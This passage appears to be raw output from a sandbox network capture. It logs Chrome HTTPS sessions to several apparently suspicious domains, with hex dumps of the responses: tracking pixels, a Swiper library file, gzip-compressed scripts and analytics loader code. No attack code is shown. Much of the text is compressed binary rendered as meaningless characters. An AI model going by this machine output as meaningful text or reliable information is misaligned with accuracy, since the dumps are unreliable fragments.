                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 9625750772021566994
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:59 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          202192.168.2.549946183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC537OUTGET /ftl/commonPage/js/float.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC717INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 1929
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-08
                                                                                                                                                          ETag: W/"612747ba-1b2f"
                                                                                                                                                          Date: Fri, 07 Jun 2024 15:49:15 GMT
                                                                                                                                                          Last-Modified: Thu, 26 Aug 2021 07:50:18 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 15:49:15 GMT
                                                                                                                                                          Age: 197503
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-08
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: f7ae3811ca99c33d98c18f9403c9b1bf
                                                                                                                                                          2024-06-09 22:40:59 UTC1929INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 5b 6f 13 47 14 7e cf af 18 52 84 77 61 e3 38 54 b4 52 4c 5a ca a5 2a 12 15 55 8b d4 07 84 aa 8d 3d 4e b6 ac 77 a3 dd 75 12 44 23 45 22 a1 81 10 9c 16 28 24 10 c2 25 10 a0 e0 b4 e2 12 93 0b bf c6 b3 b6 ff 45 cf cc ec d5 f6 7a 1d da 48 9d 17 ef ec 9c 39 97 ef 5c e6 cc ba 77 ff fe 2e b4 1f 21 fb 6d 89 cc de 42 42 fd c1 7c ed d9 2b 52 7c 5d 29 5f 45 96 3e d2 df 77 28 25 32 8a 23 78 5c ce 8f a8 18 21 b4 57 e8 fe 44 c9 76 8b c9 af 55 5d b6 04 31 4d 09 8e 8c c8 86 9c 47 fa e0 cf a8 1f 5d 84 ad 3f 28 59 4c b7 4b 83 ba 65 e9 79 36 4d c8 05 4b 4f 48 39 ba ef 7b 65 68 d8 ea 4f fd d2 27 99 74 e9 90 94 51 75 13 f7 9b 58 c5 19 4b 37 26 80 69 6f d7 de 64 4e e3 62 d0 00 ca 15 b4 8c a5 e8 1a 12 40 8a 88 2e 76 81 2e 68 54 36 10 56 61 d5
                                                                                                                                                          Data Ascii: Y[oG~Rwa8TRLZ*U=NwuD#E"($%EzH9\w.!mBB|+R|])_E>w(%2#x\!WDvU]1MG]?(YLKey6MKOH9{ehO'tQuXK7&iodNb@.v.hT6Va


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          203192.168.2.549947183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC553OUTGET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC713INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 45187
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-114-24
                                                                                                                                                          ETag: "64d5b951-b083"
                                                                                                                                                          Date: Thu, 06 Jun 2024 22:03:27 GMT
                                                                                                                                                          Last-Modified: Fri, 11 Aug 2023 04:30:09 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 22:03:27 GMT
                                                                                                                                                          Age: 261452
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;yancmp114:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-YANC-MP-114-24
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: 2b418066d953fbed5fd3ab45633d0af0
                                                                                                                                                          2024-06-09 22:40:59 UTC15671INData Raw: 2f 2a 0a 20 2a 20 53 77 69 70 65 72 20 32 2e 37 2e 30 0a 20 2a 20 4d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 61 6e 67 65 72 6f 2e 75 73 2f 73 6c 69 64 65 72 73 2f 73 77 69 70 65 72 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 30 2d 32 30 31 34 2c 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 20 54 68 65 20 69 44 61 6e 67 65 72 6f 2e 75 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 61 6e 67 65 72 6f 2e 75 73 2f 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 47
                                                                                                                                                          Data Ascii: /* * Swiper 2.7.0 * Mobile touch slider and framework with hardware accelerated transitions * * http://www.idangero.us/sliders/swiper/ * * Copyright 2010-2014, Vladimir Kharlampidi * The iDangero.us * http://www.idangero.us/ * * Licensed under G
                                                                                                                                                          2024-06-09 22:40:59 UTC16384INData Raw: 2e 77 72 61 70 70 65 72 4c 65 66 74 3d 30 2c 43 2e 77 72 61 70 70 65 72 52 69 67 68 74 3d 30 2c 43 2e 77 72 61 70 70 65 72 54 6f 70 3d 30 2c 43 2e 77 72 61 70 70 65 72 42 6f 74 74 6f 6d 3d 30 2c 43 2e 69 73 41 6e 64 72 6f 69 64 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 61 6e 64 72 6f 69 64 22 29 3e 3d 30 3b 76 61 72 20 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 3d 7b 65 76 65 6e 74 54 61 72 67 65 74 3a 22 77 72 61 70 70 65 72 22 2c 6d 6f 64 65 3a 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 74 6f 75 63 68 52 61 74 69 6f 3a 31 2c 73 70 65 65 64 3a 33 30 30 2c 66 72 65 65 4d 6f 64 65 3a 21 31 2c 66 72 65 65 4d 6f 64 65 46 6c 75 69 64 3a 21 31 2c 6d 6f 6d 65 6e 74 75 6d 52 61 74
                                                                                                                                                          Data Ascii: .wrapperLeft=0,C.wrapperRight=0,C.wrapperTop=0,C.wrapperBottom=0,C.isAndroid=navigator.userAgent.toLowerCase().indexOf("android")>=0;var D,E,F,G,H,I,J={eventTarget:"wrapper",mode:"horizontal",touchRatio:1,speed:300,freeMode:!1,freeModeFluid:!1,momentumRat
                                                                                                                                                          2024-06-09 22:40:59 UTC13132INData Raw: 2e 6c 6f 6f 70 29 7b 76 61 72 20 69 3d 43 2e 6c 6f 6f 70 65 64 53 6c 69 64 65 73 3b 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3d 43 2e 61 63 74 69 76 65 49 6e 64 65 78 2d 69 2c 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3e 3d 43 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 32 2a 69 26 26 28 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3d 43 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 32 2a 69 2d 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 29 2c 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3c 30 26 26 28 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 3d 43 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 32 2a 69 2b 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65 78 29 2c 43 2e 61 63 74 69 76 65 4c 6f 6f 70 49 6e 64 65
                                                                                                                                                          Data Ascii: .loop){var i=C.loopedSlides;C.activeLoopIndex=C.activeIndex-i,C.activeLoopIndex>=C.slides.length-2*i&&(C.activeLoopIndex=C.slides.length-2*i-C.activeLoopIndex),C.activeLoopIndex<0&&(C.activeLoopIndex=C.slides.length-2*i+C.activeLoopIndex),C.activeLoopInde


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          204192.168.2.54994923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC551OUTGET /cc.png?r=4421600803 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC606INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:59 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[507],EU-GER-frankfurt-EDGE4-CACHE1[304,TCP_MISS,504],EU-FRA-paris-GLOBAL1-CACHE18[294],EU-FRA-paris-GLOBAL1-CACHE2[289,TCP_MISS,293],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 278
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0375445fef9308bef0b59b1abc620f12
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:59 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          205192.168.2.549948163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC559OUTGET /ocs/cc.png?1717972856368 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC419INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:59 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache18.l2hk3[6,0], cache23.l2sg3[39,0], ens-cache1.de5[241,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9517179728592141642e
                                                                                                                                                          2024-06-09 22:40:59 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          206192.168.2.549950211.152.148.884434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC553OUTGET /cc.png?r=7992680070 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:59 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 9983651289027363708
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:59 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          207192.168.2.549951183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC584OUTGET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:59 UTC715INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 4126
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-114-06
                                                                                                                                                          ETag: W/"655579ca-3a09"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:01 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:01 GMT
                                                                                                                                                          Age: 297358
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;yancmp114:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-YANC-MP-114-06
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-05
                                                                                                                                                          X-Cdn-Request-ID: 5521fa9273cb67ec422704493eab3633
                                                                                                                                                          2024-06-09 22:40:59 UTC4126INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1b ed 72 db 36 f2 55 6c 8e 2b 93 15 45 4b 76 d3 26 96 69 4f ea 38 4d 66 e2 f4 f3 7a 3f 24 a5 43 49 90 c4 86 22 15 92 72 e2 93 f8 22 f7 2c f7 4e f7 0a b7 1f 00 08 52 92 5d a7 be e9 fd 38 4f 1b 93 8b dd c5 62 bf 01 c2 f6 64 19 8f f2 30 89 ed 49 30 ca 93 f4 d6 59 85 13 3b bf 5d 88 64 b2 37 16 93 30 16 be ef 5b 0a cb 6a 34 18 e8 05 f3 b1 b3 e2 67 bb 67 fd fe 61 29 d2 5b cb 85 87 5f 83 28 1c 07 b9 b0 06 ae 62 59 88 28 13 2b f9 66 ff fe 23 e2 3a 45 61 eb b9 0f 9c 95 7a 86 49 a3 e7 51 f4 3a 1e 8b 4f 22 b3 e3 60 2e 9c 55 2a f2 65 1a ef e1 8b 97 8a 45 14 8c 84 7d d4 ef f5 c7 cd fe e0 68 ea 5a bd 81 e5 14 07 de 0d 4f 9d a4 5e 26 f2 17 62 12 2c a3 3c b3 57 22 4d 93 f4 32 0a b2 ec d4 9a 05 59 8b de 3b 96 fb 5e dc 2e 52 91 65 2f 44 14
                                                                                                                                                          Data Ascii: r6Ul+EKv&iO8Mfz?$CI"r",NR]8Obd0I0Y;]d70[j4gga)[_(bY(+f#:EazIQ:O"`.U*eE}hZO^&b,<W"M2Y;^.Re/D


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          208192.168.2.549953170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC613OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC507INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=0bb4f3003579e1017b17f2dc92a714c33e827972acd45a7194e69faa514c5a42; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 8
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:00 UTC1133INData Raw: 34 36 36 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20
                                                                                                                                                          Data Ascii: 466{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async =
                                                                                                                                                          2024-06-09 22:41:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          209192.168.2.54995423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC543OUTGET /pc/240516-03/static/js/manifest.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
